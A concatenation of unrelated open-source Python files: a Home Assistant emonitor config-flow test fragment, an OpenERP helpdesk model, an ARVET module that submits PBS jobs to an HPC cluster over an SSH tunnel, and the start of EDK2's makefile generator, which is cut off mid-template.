DOMAIN, context={"source": config_entries.SOURCE_USER}
)
assert result["type"] == "form"
assert result["errors"] == {}
with patch(
"homeassistant.components.emonitor.config_flow.Emonitor.async_get_status",
return_value=_mock_emonitor(),
), patch(
"homeassistant.components.emonitor.async_setup_entry",
return_value=True,
):
result2 = await hass.config_entries.flow.async_configure(
result["flow_id"],
{
"host": "1.2.3.4",
},
)
await hass.async_block_till_done()
assert result2["type"] == "abort"
assert result2["reason"] == "already_configured"
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import openerp
from openerp.addons.crm import crm
from openerp.osv import fields, osv
from openerp import tools
from openerp.tools.translate import _
from openerp.tools import html2plaintext
class crm_helpdesk(osv.osv):
""" Helpdesk Cases """
_name = "crm.helpdesk"
_description = "Helpdesk"
_order = "id desc"
_inherit = ['mail.thread']
_columns = {
'id': fields.integer('ID', readonly=True),
'name': fields.char('Name', required=True),
'active': fields.boolean('Active', required=False),
'date_action_last': fields.datetime('Last Action', readonly=1),
'date_action_next': fields.datetime('Next Action', readonly=1),
'description': fields.text('Description'),
'create_date': fields.datetime('Creation Date' , readonly=True),
'write_date': fields.datetime('Update Date' , readonly=True),
'date_deadline': fields.date('Deadline'),
'user_id': fields.many2one('res.users', 'Responsible'),
'section_id': fields.many2one('crm.case.section', 'Sales Team', \
select=True, help='Responsible sales team. Define Responsible user and Email account for mail gateway.'),
'company_id': fields.many2one('res.company', 'Company'),
'date_closed': fields.datetime('Closed', readonly=True),
'partner_id': fields.many2one('res.partner', 'Partner'),
'email_cc': fields.text('Watchers Emails', size=252 , help="These email addresses will be added to the CC field of all inbound and outbound emails for this record before being sent. Separate multiple email addresses with a comma"),
'email_from': fields.char('Email', size=128, help="Destination email for email gateway"),
'date': fields.datetime('Date'),
'ref': fields.reference('Reference', selection=openerp.addons.base.res.res_request.referencable_models),
'ref2': fields.reference('Reference 2', selection=openerp.addons.base.res.res_request.referencable_models),
'channel_id': fields.many2one('crm.tracking.medium', 'Channel', help="Communication channel."),
'planned_revenue': fields.float('Planned Revenue'),
'planned_cost': fields.float('Planned Costs'),
'priority': fields.selection([('0','Low'), ('1','Normal'), ('2','High')], 'Priority'),
'probability': fields.float('Probability (%)'),
'categ_id': fields.many2one('crm.case.categ', 'Category', \
domain="['|',('section_id','=',False),('section_id','=',section_id),\
('object_id.model', '=', 'crm.helpdesk')]"),
'duration': fields.float('Duration', states={'done': [('readonly', True)]}),
'state': fields.selection(
[('draft', 'New'),
('open', 'In Progress'),
('pending', 'Pending'),
('done', 'Closed'),
('cancel', 'Cancelled')], 'Status', readonly=True, track_visibility='onchange',
help='The status is set to \'Draft\', when a case is created.\
\nIf the case is in progress the status is set to \'Open\'.\
\nWhen the case is over, the status is set to \'Done\'.\
\nIf the case needs to be reviewed then the status is set to \'Pending\'.'),
}
_defaults = {
'active': lambda *a: 1,
'user_id': lambda s, cr, uid, c: uid,
'state': lambda *a: 'draft',
'date': fields.datetime.now,
'company_id': lambda s, cr, uid, c: s.pool.get('res.company')._company_default_get(cr, uid, 'crm.helpdesk', context=c),
'priority': '1',
}
def on_change_partner_id(self, cr, uid, ids, partner_id, context=None):
values = {}
if partner_id:
partner = self.pool.get('res.partner').browse(cr, uid, partner_id, context=context)
values = {
'email_from': partner.email,
}
return {'value': values}
def write(self, cr, uid, ids, values, context=None):
""" Override to add case management: open/close dates """
if values.get('state'):
if values.get('state') in ['draft', 'open'] and not values.get('date_open'):
values['date_open'] = fields.datetime.now()
elif values.get('state') == 'done' and not values.get('date_closed'):
values['date_closed'] = fields.datetime.now()
return super(crm_helpdesk, self).write(cr, uid, ids, values, context=context)
def case_escalate(self, cr, uid, ids, context=None):
""" Escalates case to parent level """
data = {'active': True}
for case in self.browse(cr, uid, ids, context=context):
if case.section_id and case.section_id.parent_id:
parent_id = case.section_id.parent_id
data['section_id'] = parent_id.id
if parent_id.change_responsible and parent_id.user_id:
data['user_id'] = parent_id.user_id.id
else:
raise osv.except_osv(_('Error!'), _('You can not escalate, you are already at the top level regarding your sales-team category.'))
self.write(cr, uid, [case.id], data, context=context)
return True
# -------------------------------------------------------
# Mail gateway
# -------------------------------------------------------
def message_new(self, cr, uid, msg, custom_values=None, context=None):
""" Overrides mail_thread message_new that is called by the mailgateway
through message_process.
This override updates the document according to the email.
"""
if custom_values is None:
custom_values = {}
desc = html2plaintext(msg.get('body')) if msg.get('body') else ''
defaults = {
'name': msg.get('subject') or _("No Subject"),
'description': desc,
'email_from': msg.get('from'),
'email_cc': msg.get('cc'),
'user_id': False,
'partner_id': msg.get('author_id', False),
}
defaults.update(custom_values)
return super(crm_helpdesk, self).message_new(cr, uid, msg, custom_values=defaults, context=context)
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
# Copyright (c) 2017, John Skinner
from os import getcwd
import logging
import typing
import subprocess
import re
import bson
from pathlib import Path
from operator import attrgetter
from functools import partial
import arvet.batch_analysis.job_system
from arvet.batch_analysis.task import Task
import arvet.batch_analysis.scripts.run_task
# Basic structure for job arguments
JOB_ARGS_TEMPLATE = """
#PBS -N {name}
#PBS -l walltime={time}
#PBS -l mem={mem}
#PBS -l ncpus={cpus}
#PBS -l cpuarch=avx2
"""
# Some additional arguments in the script for using GPUs
GPU_ARGS_TEMPLATE = """
#PBS -l ngpus={gpus}
#PBS -l gputype=M40
#PBS -l cputype=E5-2680v4
"""
SSH_TUNNEL_PREFIX = """
ssh -nN -i {ssh_key} -L {local_port}:localhost:27017 {username}@{hostname} &
echo $! > {job_folder}/{job_name}-{local_port}.ssh.pid
"""
SSH_TUNNEL_SUFFIX = """
xargs kill < {job_folder}/{job_name}-{local_port}.ssh.pid
rm {job_folder}/{job_name}-{local_port}.ssh.pid
"""
class HPCJobSystem(arvet.batch_analysis.job_system.JobSystem):
"""
A job system using HPC to run tasks.
"""
def __init__(self, config: dict, config_file: str):
"""
Takes configuration parameters in a dict with the following format:
{
'node_id': 'name_of_job_system_node'
'environment': 'path-to-activate-script'
'job_location': 'folder-to-create-jobs' # Default ~
'job_name_prefix': 'prefix-to-job-names' # Default ''
'max_jobs': int # Default no limit
'ssh_tunnel': { # No tunnel if omitted
'hostname': The host to ssh to
'username': The username to connect with
'ssh_key': Path to the SSH key to connect with
'min_port': The minimum local port to use
'max_port': The highest local port to use
}
}
:param config: A dict of configuration parameters
:param config_file: Path to the configuration file, passed on to the scripts run by this job system
"""
super().__init__(config)
self._config_path = Path(config_file).expanduser().resolve()
# Work out what execution environment to use, virtualenv or conda
self._environment = config.get('environment', None)
if self._environment is not None:
self._environment = Path(self._environment).expanduser().resolve()
self._job_folder = config.get('job_location', '~')
self._job_folder = Path(self._job_folder).expanduser().resolve()
self._name_prefix = config.get('job_name_prefix', '')
self._max_jobs = max(1, int(config['max_jobs'])) if 'max_jobs' in config else None
self._expected_jobs_to_run = 0
# Configure the job to set up an ssh tunnel before running.
ssh_tunnel_config = config.get('ssh_tunnel', {})
self._ssh_host = ssh_tunnel_config.get('hostname', None)
self._ssh_key = ssh_tunnel_config.get('ssh_key', None)
self._ssh_key = Path(self._ssh_key).expanduser().resolve() if self._ssh_key is not None else None
self._ssh_username = ssh_tunnel_config.get('username', None)
self._ssh_min_port = int(ssh_tunnel_config.get('min_port', 5000))
self._ssh_max_port = int(ssh_tunnel_config.get('max_port', 65535))
self._use_ssh = bool(
self._ssh_host is not None and
self._ssh_key is not None and
self._ssh_username is not None
)
if self._use_ssh and (self._max_jobs is None or (self._ssh_max_port - self._ssh_min_port + 1) < self._max_jobs):
self._max_jobs = self._ssh_max_port - self._ssh_min_port + 1
self._checked_running_jobs = False
self._ssh_current_port = self._ssh_min_port
self._tasks_to_run = []
self._scripts_to_run = []
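# Example of the expected config dict (hypothetical values, matching the
# format documented in __init__ above):
#
#     config = {
#         'node_id': 'hpc-node-1',
#         'environment': '~/venvs/arvet/bin/activate',
#         'job_location': '~/jobs',
#         'job_name_prefix': 'auto_',
#         'max_jobs': 200,
#         'ssh_tunnel': {
#             'hostname': 'db.example.com',
#             'username': 'researcher',
#             'ssh_key': '~/.ssh/id_rsa',
#             'min_port': 5000,
#             'max_port': 5200
#         }
#     }
#     job_system = HPCJobSystem(config, 'config.yml')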
def can_generate_dataset(self, simulator: bson.ObjectId, config: dict) -> bool:
"""
Can this job system generate synthetic datasets.
HPC cannot generate datasets, because it is a server with
no X session
:param simulator: The simulator id that will be doing the generation
:param config: Configuration passed to the simulator at run time
:return: True iff the job system can generate datasets. HPC cannot.
"""
return False
def is_job_running(self, job_id: int) -> bool:
"""
Is the specified job id currently running through this job system.
This is used by the task manager to work out which jobs have failed without notification, to reschedule them.
For the HPC, a job is valid based on the output of the command 'qstat'
A running job id produced output like:
Job id Name User Time Use S Queue
---------------- ---------------- ---------------- -------- - -----
2315056.pbs auto_task_1 user 0 Q quick
whereas a non-running job produces:
qstat: Unknown Job Id 2315.pbs
an invalid job produces:
qstat: illegally formed job identifier: 231512525
A finished job produces:
qstat: 2338916.pbs Job has finished, use -x or -H to obtain historical job information
:param job_id: The integer job id to check
:return: True if the job is currently running on this node
"""
result = subprocess.run(['qstat', str(int(job_id))], stdout=subprocess.PIPE, stderr=subprocess.STDOUT,
universal_newlines=True)
output = result.stdout.lower() # Case insensitive
return 'unknown job id' not in output and 'job has finished' not in output
def run_task(self, task: Task) -> bool:
"""
Run a particular task
:param task: The task to run
:return: True if the task was accepted and queued, False otherwise
"""
if self.can_run_task(task) and not self.is_queue_full():
self._tasks_to_run.append(task)
# Jobs that have failed before may not actually be run if there are enough jobs that haven't failed yet
if task.failure_count <= 0:
self._expected_jobs_to_run += 1
return True
return False
def run_script(
self,
script: typing.Union[str, Path],
script_args_builder: typing.Callable[..., typing.List[str]],
job_name: str = "",
num_cpus: int = 1, num_gpus: int = 0,
memory_requirements: str = '3GB', expected_duration: str = '1:00:00'
) -> bool:
"""
Run a script that is not a task on this job system
:param script: The path to the script to run
:param script_args_builder: A lambda that returns list of command line arguments, as strings
:param job_name: A unique name to use for the job.
:param num_cpus: The number of CPUs required
:param num_gpus: The number of GPUs required
:param memory_requirements: The required amount of memory
:param expected_duration: The duration given for the job to run
:return: True if the script was accepted and queued, False otherwise.
"""
if not self.is_queue_full():
self._scripts_to_run.append((
script, script_args_builder, job_name, num_cpus, num_gpus, memory_requirements, expected_duration
))
self._expected_jobs_to_run += 1
return True
return False
def is_queue_full(self) -> bool:
"""
If we have collected enough jobs that we expect to run to fill the queue.
:return:
"""
return self._max_jobs is not None and self._expected_jobs_to_run >= self._max_jobs
def run_queued_jobs(self):
"""
Run queued jobs.
We're doing something a little complex:
HPC will run jobs in parallel. Most tasks are fine to run in parallel,
however HDF5 does not support concurrent write, so ImportDatasetTasks must be run sequentially instead
So we have three groups of jobs:
- Scripts, which are run parallel
- Tasks that are not ImportDatasetTasks, which are also run parallel
- ImportDatasetTasks, which are run all together in a single job
:return:
"""
# Run scripts in parallel
logging.getLogger(__name__).info("Submitting {0} scripts to HPC".format(len(self._scripts_to_run)))
for (
script,
script_args_builder,
job_name,
num_cpus,
num_gpus,
memory_requirements,
expected_duration
) in self._scripts_to_run:
self._create_and_run_script(
scripts=[(script, script_args_builder)],
job_name=job_name,
num_cpus=num_cpus,
num_gpus=num_gpus,
memory_requirements=memory_requirements,
expected_duration=expected_duration
)
self._scripts_to_run = []
# Submit jobs for tasks, starting with those that have failed the least
logging.getLogger(__name__).info("Submitting {0} tasks to HPC".format(len(self._tasks_to_run)))
for task in sorted(self._tasks_to_run, key=attrgetter('failure_count')):
job_id = self._create_and_run_script(
scripts=[(
Path(arvet.batch_analysis.scripts.run_task.__file__).resolve(),
partial(task_args_builder, task)
)],
job_name=task.get_unique_name(),
num_cpus=task.num_cpus,
num_gpus=task.num_gpus,
memory_requirements=task.memory_requirements,
expected_duration=task.expected_duration
)
if job_id is not None:
task.mark_job_started(self.node_id, job_id)
task.save()
self._tasks_to_run = []
self._expected_jobs_to_run = 0
def _create_and_run_script(
self,
scripts: typing.Collection[typing.Tuple[typing.Union[str, Path], typing.Callable[..., typing.List[str]]]],
job_name: str = "",
num_cpus: int = 1, num_gpus: int = 0,
memory_requirements: str = '3GB', expected_duration: str = '1:00:00'
) -> typing.Union[int, None]:
"""
Actually create and submit a job, which may run one or more actual scripts.
Only ever counts as one toward max_jobs
:param scripts: A collection of (script path, argument builder) pairs, all run within this single job
:param job_name: A unique name to use for the job
:param num_cpus: The number of CPUs required
:param num_gpus: The number of GPUs required
:param memory_requirements: The required amount of memory
:param expected_duration: The walltime to request for the job
:return: The integer job id returned by qsub, or None if the job was not submitted
"""
if len(scripts) <= 0:
# No point in creating a job that doesn't run any scripts
return None
# Optionally limit the number of jobs
if self._max_jobs is not None:
# If we haven't yet, get the current number of running jobs,
# so we don't double up by running this repeatedly
if not self._checked_running_jobs:
result = subprocess.run(['qjobs'], stdout=subprocess.PIPE, universal_newlines=True)
re_match = re.search('(\\d+) running jobs found', result.stdout)
if re_match is not None:
num_jobs = int(re_match.groups(default='0')[0])
self._max_jobs -= num_jobs
self._checked_running_jobs = True
# Don't submit more than the max jobs, if a limit is set
if self._max_jobs <= 0:
# Cannot submit any more jobs
logging.getLogger(__name__).info("Failed to submit job, job limit reached")
return None
self._max_jobs -= 1
# Choose a job name and a unique file
job_name = self._name_prefix + job_name
job_file_path = self._job_folder / (job_name + '.sub')
offset = 0
while job_file_path.exists():
offset += 1
job_file_path = self._job_folder / (job_name + '_{0}.sub'.format(offset))
lines = ['#!/bin/bash -l']
# basic job meta-information
if not isinstance(expected_duration, str) or not re.match('^[0-9]+:[0-9]{2}:[0-9]{2}$', expected_duration):
expected_duration = '1:00:00'
if not isinstance(memory_requirements, str) or not re.match('^[0-9]+[TGMK]B$', memory_requirements):
memory_requirements = '3GB'
lines.append(JOB_ARGS_TEMPLATE.format(
name=job_name,
time=expected_duration,
mem=memory_requirements,
cpus=num_cpus
).strip())
# Additional args based on the number of GPUs
if num_gpus > 0:
lines.append(GPU_ARGS_TEMPLATE.format(gpus=num_gpus).strip())
elif int(memory_requirements.rstrip('MGB')) > 125:
lines.append('#PBS -l cputype=E5-2680v3')
# Actually assemble the script commands, line group by line group
if self._environment is not None:
lines.append('source ' + quote(str(self._environment)))
# change to the current working dir
lines.append('cd {0} || exit'.format(quote(getcwd())))
# Activate an SSH tunnel, if required
port = None
if self._use_ssh:
# Find a port *we* are not using
port = self._ssh_current_port
while port <= self._ssh_max_port and any(True for _ in self._job_folder.glob('*-{0}.ssh.pid'.format(port))):
port += 1
self._ssh_current_port = port + 1
lines.append(SSH_TUNNEL_PREFIX.format(
job_name=job_name,
username=self._ssh_username,
ssh_key=self._ssh_key,
local_port=port,
hostname=self._ssh_host,
job_folder=self._job_folder
).strip())
# Add the actual script commands
for script, script_args_builder in scripts:
script_args = script_args_builder(self._config_path, port)
lines.append('python {script} {args}'.format(
script=quote(str(script)),
args=' '.join([quote(arg) for arg in script_args])
))
# Add commands for closing the SSH tunnel, if we have one
if self._use_ssh:
lines.append(SSH_TUNNEL_SUFFIX.format(
job_name=job_name, local_port=port, job_folder=self._job_folder).strip())
# Clean up the job file when we're done
lines.append("rm {0}".format(job_file_path))
# Write the job file
with open(job_file_path, 'w+') as job_file:
job_file.write('\n'.join(lines))
logging.getLogger(__name__).info("Submitting job file {0}".format(job_file_path))
result = subprocess.run(['qsub', job_file_path], stdout=subprocess.PIPE, universal_newlines=True)
match_result = re.search('(\\d+)', result.stdout)
if match_result is None:
raise RuntimeError(f"Failed to find JobId in ouput of qsub call, probably failed to submit job.\n"
f"Output was:\n{result.stdout}")
job_id = match_result.group()
return int(job_id)
def task_args_builder(task: Task, config, port: int = None):
"""
Make the command line arguments for running a task
run_queued_jobs binds the task with functools.partial; the config path and port are supplied when the job script is assembled.
:param task: The task whose primary key is passed to the run_task script
:param config: Path to the configuration file
:param port: Local port of the SSH tunnel to the database, or None for no tunnel
:return: The list of command line arguments
"""
args = ['--config', str(config)]
if port is not None:
args += ['--mongodb_port', str(port)]
args.append(str(task.pk))
return args
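# Example (hypothetical values): for a task whose primary key renders as
# '5c4d...', task_args_builder(task, '/home/user/config.yml', 5000) returns
# ['--config', '/home/user/config.yml', '--mongodb_port', '5000', '5c4d...'],
# i.e. the arguments handed to the run_task script inside the job file.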
def parse_memory_requirements(memory: str):
"""
Turn a memory requirements string to a size in KB
:param memory:
:return:
"""
memory = memory.upper()
if memory.endswith('GB'):
return 1024 * 1024 * int(memory.rstrip('GMKB'))
elif memory.endswith('MB'):
return 1024 * int(memory.rstrip('GMKB'))
return int(memory.rstrip('GMKB'))
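# Examples: parse_memory_requirements('3GB') -> 3145728 (KB),
# parse_memory_requirements('512MB') -> 524288, while a bare or KB-suffixed
# value such as '2048KB' is returned as-is (2048).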
def merge_expected_durations(durations: typing.Iterable[str]) -> str:
"""
Join together the estimated times of multiple tasks into a combined time
:param durations:
:return:
"""
hours = 0
minutes = 0
seconds = 0
for duration in durations:
parts = duration.split(':')
if len(parts) >= 3:
hours += int(parts[0])
minutes += int(parts[1])
seconds += int(parts[2])
minutes += seconds // 60
seconds = seconds % 60
hours += minutes // 60
minutes = minutes % 60
return "{0:02}:{1:02}:{2:02}".format(hours, minutes, seconds)
def quote(string: str) -> str:
"""
Wrap a string with quotes iff it contains a space. Used for interacting with command line scripts.
:param string:
:return:
"""
if ' ' in string:
return '"' + string + '"'
return string
|
## @file
# Create makefile for MS nmake and GNU make
#
# Copyright (c) 2007 - 2020, Intel Corporation. All rights reserved.<BR>
# Copyright (c) 2020, ARM Limited. All rights reserved.<BR>
# SPDX-License-Identifier: BSD-2-Clause-Patent
#
## Import Modules
#
from __future__ import absolute_import
import Common.LongFilePathOs as os
import sys
import string
import re
import os.path as path
from Common.LongFilePathSupport import OpenLongFilePath as open
from Common.MultipleWorkspace import MultipleWorkspace as mws
from Common.BuildToolError import *
from Common.Misc import *
from Common.StringUtils import *
from .BuildEngine import *
import Common.GlobalData as GlobalData
from collections import OrderedDict
from Common.DataType import TAB_COMPILER_MSFT
## Regular expression for finding header file inclusions
gIncludePattern = re.compile(r"^[ \t]*[#%]?[ \t]*include(?:[ \t]*(?:\\(?:\r\n|\r|\n))*[ \t]*)*(?:\(?[\"<]?[ \t]*)([-\w.\\/() \t]+)(?:[ \t]*[\">]?\)?)", re.MULTILINE | re.UNICODE | re.IGNORECASE)
## Regular expression for matching macro used in header file inclusion
gMacroPattern = re.compile("([_A-Z][_A-Z0-9]*)[ \t]*\((.+)\)", re.UNICODE)
gIsFileMap = {}
## pattern for include style in Edk.x code
gProtocolDefinition = "Protocol/%(HeaderKey)s/%(HeaderKey)s.h"
gGuidDefinition = "Guid/%(HeaderKey)s/%(HeaderKey)s.h"
gArchProtocolDefinition = "ArchProtocol/%(HeaderKey)s/%(HeaderKey)s.h"
gPpiDefinition = "Ppi/%(HeaderKey)s/%(HeaderKey)s.h"
gIncludeMacroConversion = {
"EFI_PROTOCOL_DEFINITION" : gProtocolDefinition,
"EFI_GUID_DEFINITION" : gGuidDefinition,
"EFI_ARCH_PROTOCOL_DEFINITION" : gArchProtocolDefinition,
"EFI_PROTOCOL_PRODUCER" : gProtocolDefinition,
"EFI_PROTOCOL_CONSUMER" : gProtocolDefinition,
"EFI_PROTOCOL_DEPENDENCY" : gProtocolDefinition,
"EFI_ARCH_PROTOCOL_PRODUCER" : gArchProtocolDefinition,
"EFI_ARCH_PROTOCOL_CONSUMER" : gArchProtocolDefinition,
"EFI_ARCH_PROTOCOL_DEPENDENCY" : gArchProtocolDefinition,
"EFI_PPI_DEFINITION" : gPpiDefinition,
"EFI_PPI_PRODUCER" : gPpiDefinition,
"EFI_PPI_CONSUMER" : gPpiDefinition,
"EFI_PPI_DEPENDENCY" : gPpiDefinition,
}
NMAKE_FILETYPE = "nmake"
GMAKE_FILETYPE = "gmake"
WIN32_PLATFORM = "win32"
POSIX_PLATFORM = "posix"
## BuildFile class
#
# This base class encapsulates a build file and its generation. It uses a template to generate
# the content of the build file, which is obtained from AutoGen objects.
#
class BuildFile(object):
## template used to generate the build file (i.e. makefile if using make)
_TEMPLATE_ = TemplateString('')
_DEFAULT_FILE_NAME_ = "Makefile"
## default file name for each type of build file
_FILE_NAME_ = {
NMAKE_FILETYPE : "Makefile",
GMAKE_FILETYPE : "GNUmakefile"
}
# Get Makefile name.
def getMakefileName(self):
if not self._FileType:
return self._DEFAULT_FILE_NAME_
else:
return self._FILE_NAME_[self._FileType]
## Fixed header string for makefile
_MAKEFILE_HEADER = '''#
# DO NOT EDIT
# This file is auto-generated by build utility
#
# Module Name:
#
# %s
#
# Abstract:
#
# Auto-generated makefile for building modules, libraries or platform
#
'''
## Header string for each type of build file
_FILE_HEADER_ = {
NMAKE_FILETYPE : _MAKEFILE_HEADER % _FILE_NAME_[NMAKE_FILETYPE],
GMAKE_FILETYPE : _MAKEFILE_HEADER % _FILE_NAME_[GMAKE_FILETYPE]
}
## shell commands which can be used in build file in the form of macro
# $(CP) copy file command
# $(MV) move file command
# $(RM) remove file command
# $(MD) create dir command
# $(RD) remove dir command
#
_SHELL_CMD_ = {
WIN32_PLATFORM : {
"CP" : "copy /y",
"MV" : "move /y",
"RM" : "del /f /q",
"MD" : "mkdir",
"RD" : "rmdir /s /q",
},
POSIX_PLATFORM : {
"CP" : "cp -f",
"MV" : "mv -f",
"RM" : "rm -f",
"MD" : "mkdir -p",
"RD" : "rm -r -f",
}
}
## directory separator
_SEP_ = {
WIN32_PLATFORM : "\\",
POSIX_PLATFORM : "/"
}
## directory creation template
_MD_TEMPLATE_ = {
WIN32_PLATFORM : 'if not exist %(dir)s $(MD) %(dir)s',
POSIX_PLATFORM : "$(MD) %(dir)s"
}
## directory removal template
_RD_TEMPLATE_ = {
WIN32_PLATFORM : 'if exist %(dir)s $(RD) %(dir)s',
POSIX_PLATFORM : "$(RD) %(dir)s"
}
## cp if exist
_CP_TEMPLATE_ = {
WIN32_PLATFORM : 'if exist %(Src)s $(CP) %(Src)s %(Dst)s',
POSIX_PLATFORM : "test -f %(Src)s && $(CP) %(Src)s %(Dst)s"
}
_CD_TEMPLATE_ = {
WIN32_PLATFORM : 'if exist %(dir)s cd %(dir)s',
POSIX_PLATFORM : "test -e %(dir)s && cd %(dir)s"
}
_MAKE_TEMPLATE_ = {
WIN32_PLATFORM : 'if exist %(file)s "$(MAKE)" $(MAKE_FLAGS) -f %(file)s',
POSIX_PLATFORM : 'test -e %(file)s && "$(MAKE)" $(MAKE_FLAGS) -f %(file)s'
}
_INCLUDE_CMD_ = {
NMAKE_FILETYPE : '!INCLUDE',
GMAKE_FILETYPE : "include"
}
_INC_FLAG_ = {TAB_COMPILER_MSFT : "/I", "GCC" : "-I", "INTEL" : "-I", "RVCT" : "-I", "NASM" : "-I"}
## Constructor of BuildFile
#
# @param AutoGenObject Object of AutoGen class
#
def __init__(self, AutoGenObject):
self._AutoGenObject = AutoGenObject
MakePath = AutoGenObject.BuildOption.get('MAKE', {}).get('PATH')
if not MakePath:
self._FileType = ""
elif "nmake" in MakePath:
self._FileType = NMAKE_FILETYPE
else:
self._FileType = "gmake"
if sys.platform == "win32":
self._Platform = WIN32_PLATFORM
else:
self._Platform = POSIX_PLATFORM
## Create build file.
#
# Only nmake and gmake are supported.
#
# @retval TRUE The build file is created or re-created successfully.
# @retval FALSE The build file exists and is the same as the one to be generated.
#
def Generate(self):
FileContent = self._TEMPLATE_.Replace(self._TemplateDict)
FileName = self.getMakefileName()
if not os.path.exists(os.path.join(self._AutoGenObject.MakeFileDir, "deps.txt")):
with open(os.path.join(self._AutoGenObject.MakeFileDir, "deps.txt"),"w+") as fd:
fd.write("")
if not os.path.exists(os.path.join(self._AutoGenObject.MakeFileDir, "dependency")):
with open(os.path.join(self._AutoGenObject.MakeFileDir, "dependency"),"w+") as fd:
fd.write("")
if not os.path.exists(os.path.join(self._AutoGenObject.MakeFileDir, "deps_target")):
with open(os.path.join(self._AutoGenObject.MakeFileDir, "deps_target"),"w+") as fd:
fd.write("")
return SaveFileOnChange(os.path.join(self._AutoGenObject.MakeFileDir, FileName), FileContent, False)
## Return a list of directory creation command string
#
# @param DirList The list of directory to be created
#
# @retval list The directory creation command list
#
def GetCreateDirectoryCommand(self, DirList):
return [self._MD_TEMPLATE_[self._Platform] % {'dir':Dir} for Dir in DirList]
## Return a list of directory removal command string
#
# @param DirList The list of directory to be removed
#
# @retval list The directory removal command list
#
def GetRemoveDirectoryCommand(self, DirList):
return [self._RD_TEMPLATE_[self._Platform] % {'dir':Dir} for Dir in DirList]
def PlaceMacro(self, Path, MacroDefinitions=None):
if Path.startswith("$("):
return Path
else:
if MacroDefinitions is None:
MacroDefinitions = {}
PathLength = len(Path)
for MacroName in MacroDefinitions:
MacroValue = MacroDefinitions[MacroName]
MacroValueLength = len(MacroValue)
if MacroValueLength == 0:
continue
if MacroValueLength <= PathLength and Path.startswith(MacroValue):
Path = "$(%s)%s" % (MacroName, Path[MacroValueLength:])
break
return Path
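# For example, with MacroDefinitions = {"BUILD_DIR": "C:\\Build"},
# PlaceMacro("C:\\Build\\Pkg\\Module", MacroDefinitions) returns
# "$(BUILD_DIR)\\Pkg\\Module"; paths already starting with "$(" are
# returned unchanged.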
## ModuleMakefile class
#
# This class encapsulates the makefile and its generation for a module. It uses a template to generate
# the content of the makefile, which is obtained from the ModuleAutoGen object.
#
class ModuleMakefile(BuildFile):
## template used to generate the makefile for module
_TEMPLATE_ = TemplateString('''\
${makefile_header}
#
# Platform Macro Definition
#
PLATFORM_NAME = ${platform_name}
PLATFORM_GUID = ${platform_guid}
PLATFORM_VERSION = ${platform_version}
PLATFORM_RELATIVE_DIR = ${platform_relative_directory}
PLATFORM_DIR = ${platform_dir}
PLATFORM_OUTPUT_DIR = ${platform_output_directory}
#
# Module Macro Definition
#
MODULE_NAME = ${module_name}
MODULE_GUID = ${module_guid}
MODULE_NAME_GUID = ${module_name_guid}
MODULE_VERSION = ${module_version}
MODULE_TYPE = ${module_type}
MODULE_FILE = ${module_file}
MODULE_FILE_BASE_NAME = ${module_file_base_name}
BASE_NAME = $(MODULE_NAME)
MODULE_RELATIVE_DIR = ${module_relative_directory}
PACKAGE_RELATIVE_DIR = ${package_relative_directory}
MODULE_DIR = ${module_dir}
FFS_OUTPUT_DIR = ${ffs_output_directory}
MODULE_ENTRY_POINT = ${module_entry_point}
ARCH_ENTRY_POINT = ${arch_entry_point}
IMAGE_ENTRY_POINT = ${image_entry_point}
${BEGIN}${module_extra_defines}
${END}
#
# Build Configuration Macro Definition
#
ARCH = ${architecture}
TOOLCHAIN = ${toolchain_tag}
TOOLCHAIN_TAG = ${toolchain_tag}
TARGET = ${build_target}
#
# Build Directory Macro Definition
#
# PLATFORM_BUILD_DIR = ${platform_build_directory}
BUILD_DIR = ${platform_build_directory}
BIN_DIR = $(BUILD_DIR)${separator}${architecture}
LIB_DIR = $(BIN_DIR)
MODULE_BUILD_DIR = ${module_build_directory}
OUTPUT_DIR = ${module_output_directory}
DEBUG_DIR = ${module_debug_directory}
DEST_DIR_OUTPUT = $(OUTPUT_DIR)
DEST_DIR_DEBUG = $(DEBUG_DIR)
#
# Shell Command Macro
#
${BEGIN}${shell_command_code} = ${shell_command}
${END}
#
# Tools definitions specific to this module
#
${BEGIN}${module_tool_definitions}
${END}
MAKE_FILE = ${makefile_path}
#
# Build Macro
#
${BEGIN}${file_macro}
${END}
#
# Overridable Target Macro Definitions
#
FORCE_REBUILD = force_build
INIT_TARGET = init
PCH_TARGET =
BC_TARGET = ${BEGIN}${backward_compatible_target} ${END}
CODA_TARGET = ${BEGIN}${remaining_build_target} \\
${END}
#
# Default target, which will build dependent libraries in addition to source files
#
all: mbuild
#
# Target used when called from platform makefile, which will bypass the build of dependent libraries
#
pbuild: $(INIT_TARGET) $(BC_TARGET) $(PCH_TARGET) $(CODA_TARGET)
#
# ModuleTarget
#
mbuild: $(INIT_TARGET) $(BC_TARGET) gen_libs $(PCH_TARGET) $(CODA_TARGET)
#
# Build Target used in multi-thread build mode, which will bypass the init and gen_libs targets
#
tbuild: $(BC_TARGET) $(PCH_TARGET) $(CODA_TARGET)
#
# Phony target which is used to force executing commands for a target
#
force_build:
\t-@
#
# Target to update the FD
#
fds: mbuild gen_fds
#
# Initialization target: print build information and create necessary directories
#
init: info dirs
info:
\t-@echo Building ... $(MODULE_DIR)${separator}$(MODULE_FILE) [$(ARCH)]
dirs:
${BEGIN}\t-@${create_directory_command}\n${END}
strdefs:
\t-@$(CP) $(DEBUG_DIR)${separator}AutoGen.h $(DEBUG_DIR)${separator}$(MODULE_NAME)StrDefs.h
#
# GenLibsTarget
#
gen_libs:
\t${BEGIN}@"$(MAKE)" $(MAKE_FLAGS) -f ${dependent_library_build_directory}${separator}${makefile_name}
\t${END}@cd $(MODULE_BUILD_DIR)
#
# Build Flash Device Image
#
gen_fds:
\t@"$(MAKE)" $(MAKE_FLAGS) -f $(BUILD_DIR)${separator}${makefile_name} fds
\t@cd $(MODULE_BUILD_DIR)
${INCLUDETAG}
#
# Individual Object Build Targets
#
${BEGIN}${file_build_target}
${END}
#
# clean all intermediate files
#
clean:
\t${BEGIN}${clean_command}
